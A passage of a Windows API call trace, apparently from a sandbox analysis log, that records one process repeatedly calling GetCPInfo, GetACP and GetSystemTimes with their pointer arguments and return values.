CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.366] GetACP () returned 0x4e4 [0167.366] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.366] GetACP () returned 0x4e4 [0167.366] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.366] GetACP () returned 0x4e4 [0167.366] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.366] GetACP () returned 0x4e4 [0167.366] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.366] GetACP () returned 0x4e4 [0167.366] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.366] GetACP () returned 0x4e4 [0167.366] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.366] GetACP () returned 0x4e4 [0167.367] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.367] GetACP () returned 0x4e4 [0167.367] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.367] GetACP () returned 0x4e4 [0167.367] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.367] GetACP () returned 0x4e4 [0167.367] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.367] GetACP () returned 0x4e4 [0167.367] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.367] GetACP () returned 0x4e4 [0167.367] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.367] GetACP () returned 0x4e4 [0167.367] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.367] GetACP () returned 0x4e4 [0167.368] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.368] GetACP () returned 0x4e4 [0167.368] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.368] GetACP () returned 0x4e4 [0167.368] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.368] GetACP () returned 0x4e4 [0167.368] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.368] GetACP () returned 0x4e4 [0167.368] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.368] GetACP () returned 0x4e4 [0167.368] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.368] GetACP () returned 0x4e4 [0167.368] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.369] GetACP () returned 0x4e4 [0167.369] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.369] GetACP () returned 0x4e4 [0167.369] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.369] GetACP () returned 0x4e4 [0167.369] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.369] GetACP () returned 0x4e4 [0167.369] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.369] GetACP () returned 0x4e4 [0167.369] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.369] GetACP () returned 0x4e4 [0167.369] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.370] GetACP () returned 0x4e4 [0167.370] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.370] GetACP () returned 0x4e4 [0167.370] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.370] GetACP () returned 0x4e4 [0167.370] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.370] GetACP () returned 0x4e4 [0167.370] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.370] GetACP () returned 0x4e4 [0167.370] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.370] GetACP () returned 0x4e4 [0167.370] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.370] GetACP () returned 0x4e4 [0167.370] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.371] GetACP () returned 0x4e4 [0167.371] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.371] GetACP () returned 0x4e4 [0167.371] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.371] GetACP () returned 0x4e4 [0167.371] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.371] GetACP () returned 0x4e4 [0167.371] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.371] GetACP () returned 0x4e4 [0167.371] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.371] GetACP () returned 0x4e4 [0167.371] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.372] GetACP () returned 0x4e4 [0167.372] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.372] GetACP () returned 0x4e4 [0167.372] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.372] GetACP () returned 0x4e4 [0167.372] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.372] GetACP () returned 0x4e4 [0167.372] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.372] GetACP () returned 0x4e4 [0167.372] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.372] GetACP () returned 0x4e4 [0167.372] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.373] GetACP () returned 0x4e4 [0167.373] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.373] GetACP () returned 0x4e4 [0167.373] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.373] GetACP () returned 0x4e4 [0167.373] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.373] GetACP () returned 0x4e4 [0167.373] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.373] GetACP () returned 0x4e4 [0167.373] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.373] GetACP () returned 0x4e4 [0167.373] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.374] GetACP () returned 0x4e4 [0167.374] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.374] GetACP () returned 0x4e4 [0167.374] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.374] GetACP () returned 0x4e4 [0167.374] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.374] GetACP () returned 0x4e4 [0167.374] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.374] GetACP () returned 0x4e4 [0167.374] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.374] GetACP () returned 0x4e4 [0167.374] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.375] GetACP () returned 0x4e4 [0167.375] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.375] GetACP () returned 0x4e4 [0167.375] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.375] GetACP () returned 0x4e4 [0167.375] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.375] GetACP () returned 0x4e4 [0167.375] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.375] GetACP () returned 0x4e4 [0167.375] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.375] GetACP () returned 0x4e4 [0167.375] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.564] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.564] GetACP () returned 0x4e4 [0170.564] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.564] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.564] GetACP () returned 0x4e4 [0170.564] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.564] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.564] GetACP () returned 0x4e4 [0170.564] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.564] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.565] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.565] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.565] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.565] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.565] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.565] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.565] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.565] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.565] GetACP () returned 0x4e4 [0170.566] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.566] GetACP () returned 0x4e4 [0170.566] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.566] GetACP () returned 0x4e4 [0170.566] GetSystemTimes (in: lpIdleTime=0x18fa70, 